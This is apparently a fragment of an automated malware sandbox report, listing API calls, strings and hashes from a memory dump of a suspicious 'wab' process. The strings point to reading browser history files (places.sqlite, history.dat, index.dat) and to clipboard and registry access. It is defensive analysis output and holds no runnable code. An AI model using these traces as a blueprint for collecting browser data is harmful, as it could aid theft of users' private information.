                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                • String ID:
                                • API String ID: 1042154641-0
                                APIs
                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                • memset.MSVCRT ref: 00403A55
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                • String ID: history.dat$places.sqlite
                                • API String ID: 3093078384-467022611
                                APIs
                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                • GetLastError.KERNEL32 ref: 00417627
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ErrorLast$File$PointerRead
                                • String ID:
                                • API String ID: 839530781-0
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID: *.*$index.dat
                                • API String ID: 1974802433-2863569691
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@mallocmemcpy
                                • String ID:
                                • API String ID: 3831604043-0
                                APIs
                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                • GetLastError.KERNEL32 ref: 004175A2
                                • GetLastError.KERNEL32 ref: 004175A8
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ErrorLast$FilePointer
                                • String ID:
                                • API String ID: 1156039329-0
                                APIs
                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$ChangeCloseCreateFindNotificationTime
                                • String ID:
                                • API String ID: 1631957507-0
                                APIs
                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Temp$DirectoryFileNamePathWindows
                                • String ID:
                                • API String ID: 1125800050-0
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: BINARY
                                • API String ID: 2221118986-907554435
                                APIs
                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                • String ID:
                                • API String ID: 1161345128-0
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: /stext
                                • API String ID: 2081463915-3817206916
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: .#v
                                • API String ID: 2081463915-507759092
                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                • String ID:
                                • API String ID: 159017214-0
                                Strings
                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID: failed to allocate %u bytes of memory
                                • API String ID: 2803490479-1168259600
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmpmemset
                                • String ID:
                                Similarity
                                • API ID: memcpymemset
                                • String ID:
                                APIs
                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                  • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                Similarity
                                • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                • String ID:
                                APIs
                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                Similarity
                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                • String ID:
                                APIs
                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                Similarity
                                • API ID: File$PointerRead
                                • String ID:
                                APIs
                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itowmemset
                                • String ID:
                                APIs
                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                APIs
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                Similarity
                                • API ID: AddressProc$FileModuleName
                                • String ID:
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                APIs
                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                APIs
                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                APIs
                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                APIs
                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                APIs
                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                APIs
                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                APIs
                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                APIs
                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                Similarity
                                • API ID: Open
                                • String ID:
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                APIs
                                • memset.MSVCRT ref: 004095FC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                Similarity
                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                • String ID:
                                • API String ID: 3655998216-0
                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                APIs
                                • memset.MSVCRT ref: 00445426
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                • String ID:
                                • API String ID: 1828521557-0
                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                APIs
                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$CloseCreateErrorHandleLastRead
                                • String ID:
                                • API String ID: 2136311172-0
                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                APIs
                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@
                                • String ID:
                                • API String ID: 1936579350-0
                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                APIs
                                • EmptyClipboard.USER32 ref: 004098EC
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                • GetLastError.KERNEL32 ref: 0040995D
                                • CloseHandle.KERNEL32(?), ref: 00409969
                                • GetLastError.KERNEL32 ref: 00409974
                                • CloseClipboard.USER32 ref: 0040997D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                • String ID:
                                • API String ID: 2565263379-0
                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                APIs
                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadMessageProc
                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                • API String ID: 2780580303-317687271
                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                APIs
                                • EmptyClipboard.USER32 ref: 00409882
                                • wcslen.MSVCRT ref: 0040988F
                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                • memcpy.MSVCRT ref: 004098B5
                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                • CloseClipboard.USER32 ref: 004098D7
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                • String ID:
                                • API String ID: 2014503067-0
                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                APIs
                                • GetLastError.KERNEL32 ref: 004182D7
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                • LocalFree.KERNEL32(?), ref: 00418342
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                • String ID: OsError 0x%x (%u)
                                • API String ID: 403622227-2664311388
                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                APIs
                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                • OpenClipboard.USER32(?), ref: 00411878
                                • GetLastError.KERNEL32 ref: 0041188D
                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
